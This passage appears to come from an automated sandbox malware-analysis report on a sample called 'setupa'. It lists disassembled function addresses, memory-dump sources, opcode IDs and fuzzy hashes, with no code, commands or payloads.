                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: 99eb7150f631e09858e8bdd23bbae2fecacc8c59e4424f5f99a442d63a020612
                                                                                                              • Instruction ID: f2406f4d17c3d5ad856764a26c0e3e4f1939873bca1970385cc151400e4441fc
                                                                                                              • Opcode Fuzzy Hash: 99eb7150f631e09858e8bdd23bbae2fecacc8c59e4424f5f99a442d63a020612
                                                                                                              • Instruction Fuzzy Hash: 8E81E322A28202C6FBB88E29904067E2390FF45FE6F542539DD4FD7695CF2EE846D741
                                                                                                              Function 00007FF689641866 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: a0943098fca554971d915b41c60b27dd0860a4ff566cc2c46447617e6c26002a
                                                                                                              • Instruction ID: 8aa4afa0bf4db8dd384f3dc287def1ef07a9e0a56b78dbb6673abab638c6aade
                                                                                                              • Opcode Fuzzy Hash: a0943098fca554971d915b41c60b27dd0860a4ff566cc2c46447617e6c26002a
                                                                                                              • Instruction Fuzzy Hash: 3681F625A18206C6FBB48E25914067E2392FF80FA6F141539DD4BD7795CF2FE846DB40
                                                                                                              Function 00007FF68964470A Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: 6c5cf887a0a8da594a91df5b60b5ec19d86c007c6afe81e6fbaa48d5c1c6fcb3
                                                                                                              • Instruction ID: 43252a1fb3df994bbe43eb5b548c320145fe54cc0e1a1a6a5d4fad085bdad75c
                                                                                                              • Opcode Fuzzy Hash: 6c5cf887a0a8da594a91df5b60b5ec19d86c007c6afe81e6fbaa48d5c1c6fcb3
                                                                                                              • Instruction Fuzzy Hash: 0371B426A0C282C6FF788EA5904027D1791BF42F4EF941539DD08D7699CEADE8C6F741
                                                                                                              Function 00007FF68964153C Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: c59881431eb1cc1aee74796d0f542b13827298b652be45b6caa07e74e77973b7
                                                                                                              • Instruction ID: eb951eea8a0177c47da3b17920e3eb15cd6994d3597b42971da6494c75dfbc98
                                                                                                              • Opcode Fuzzy Hash: c59881431eb1cc1aee74796d0f542b13827298b652be45b6caa07e74e77973b7
                                                                                                              • Instruction Fuzzy Hash: 0E710262A1C642C6FB788E69504027D2791BF51F4EF24053DDD48CB69ACEADE8C5FB01
                                                                                                              Function 00007FF68971B46C Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: dedaa7cb3e11639d4ffffec73e28fecdd2a5c9423098fb515ad4ec261d75228c
                                                                                                              • Instruction ID: 8b6cb810e3efc493e2f10a26d41f12781e363c29bab7853d565e48d40f923dbf
                                                                                                              • Opcode Fuzzy Hash: dedaa7cb3e11639d4ffffec73e28fecdd2a5c9423098fb515ad4ec261d75228c
                                                                                                              • Instruction Fuzzy Hash: E9418C62724A44C6EE44CF2AD8641A973A5FB89FC4F49A03ADE0EC7754EE3CD486C300
                                                                                                              Function 00007FF689647040 Relevance: 1.1, Instructions: 1143COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 81246b37a5b1c6a0ee2cfceede81f75e087ac22d60b1ba86d438b8f0f8944e50
                                                                                                              • Instruction ID: b90d0f497f7b018b7b940b2bea48b813a080c63350b948d6fd9a615cd59c72ee
                                                                                                              • Opcode Fuzzy Hash: 81246b37a5b1c6a0ee2cfceede81f75e087ac22d60b1ba86d438b8f0f8944e50
                                                                                                              • Instruction Fuzzy Hash: 50320172B18A96C2FB74CE6994242EA2355FF95BE5F144239CFAE877D4DE28D411C300
                                                                                                              Function 00007FF689642A59 Relevance: .8, Instructions: 825COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cee5e901351cc27747bfb3aa5b726b4f649bd67458f1991fa66d6276daaf36bd
                                                                                                              • Instruction ID: cf95865d9637dff37232db33bfd4909be247bd26aaeb78d6123c99d87323701b
                                                                                                              • Opcode Fuzzy Hash: cee5e901351cc27747bfb3aa5b726b4f649bd67458f1991fa66d6276daaf36bd
                                                                                                              • Instruction Fuzzy Hash: E3825A61E49AA3C5FAA59F65A8506B823A0FF41FC2B04403DED4EE77A5DE3CA4C1D740
                                                                                                              Function 00007FF689642356 Relevance: .7, Instructions: 706COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ea0ae62e8380f3f2b5d979bde052ee222e897304a6017f6422902152ba5b36ff
                                                                                                              • Instruction ID: 9d5d2813d42666b155f1e5fdb14d1127bf8248a0df948902ec010f1775b483a4
                                                                                                              • Opcode Fuzzy Hash: ea0ae62e8380f3f2b5d979bde052ee222e897304a6017f6422902152ba5b36ff
                                                                                                              • Instruction Fuzzy Hash: C752F312B58692C5FB258F65C4151BD23A1BF46F99F444039EE8DA7B85DF3CD981E300
                                                                                                              Function 00007FF6896449C6 Relevance: .7, Instructions: 686COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 374495b83c93241baaffcb2dcec7c1324893827efae55892393945a506d5d4fe
                                                                                                              • Instruction ID: 1b5c84ae665389fc1b0c0c3aaead66e7c2a73a24b369e66acb7e2b974c63168c
                                                                                                              • Opcode Fuzzy Hash: 374495b83c93241baaffcb2dcec7c1324893827efae55892393945a506d5d4fe
                                                                                                              • Instruction Fuzzy Hash: 7B52F022F18A92C1FB218F6594542FD27A0BF49F99F484239DE5D97B95DE38E8C1E300
                                                                                                              Function 00007FF689642AF9 Relevance: .6, Instructions: 560COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87a7ee738362bb261864851759678a1e5ebe7520e110cf5c838f0826717788eb
                                                                                                              • Instruction ID: 284485dd658c36c2fca25f556cb172840be55921e1c2cd3c450902debf248276
                                                                                                              • Opcode Fuzzy Hash: 87a7ee738362bb261864851759678a1e5ebe7520e110cf5c838f0826717788eb
                                                                                                              • Instruction Fuzzy Hash: A5326E62A4D642C5FB38EF6190601BC67A0BF46F89F048139DA8D93E82DE3CE5C5E710
                                                                                                              Function 00007FF68964522C Relevance: .6, Instructions: 560COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6076c73a4802bd9a5888ebc52a5c2b77aa104518af35b627cb4db8bb23b228e4
                                                                                                              • Instruction ID: b7627993b5a655dae8a577ca7fadc32eb47d9ab301d785c5e094a737a984c64d
                                                                                                              • Opcode Fuzzy Hash: 6076c73a4802bd9a5888ebc52a5c2b77aa104518af35b627cb4db8bb23b228e4
                                                                                                              • Instruction Fuzzy Hash: C3329122A4CA42C5FB34EF6594511BC27A0FF56F85F05813ADB8D93682EE3CE585E701
                                                                                                              Function 00007FF6896470A9 Relevance: .5, Instructions: 510COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca3e85fa98a06b8535c2bf116436b4f86ef03697104adc7d4ac096882428d08b
                                                                                                              • Instruction ID: a1a26ef18206c909a866c1ae8ede574f2cf9dcd980fbb37a07c924da715a87da
                                                                                                              • Opcode Fuzzy Hash: ca3e85fa98a06b8535c2bf116436b4f86ef03697104adc7d4ac096882428d08b
                                                                                                              • Instruction Fuzzy Hash: BF227D62A0DA82C5FB24DF6590601BD27A0FF55F89F058539DB8E87686EE3CE5C5E300
                                                                                                              Function 00007FF6896460C3 Relevance: .4, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
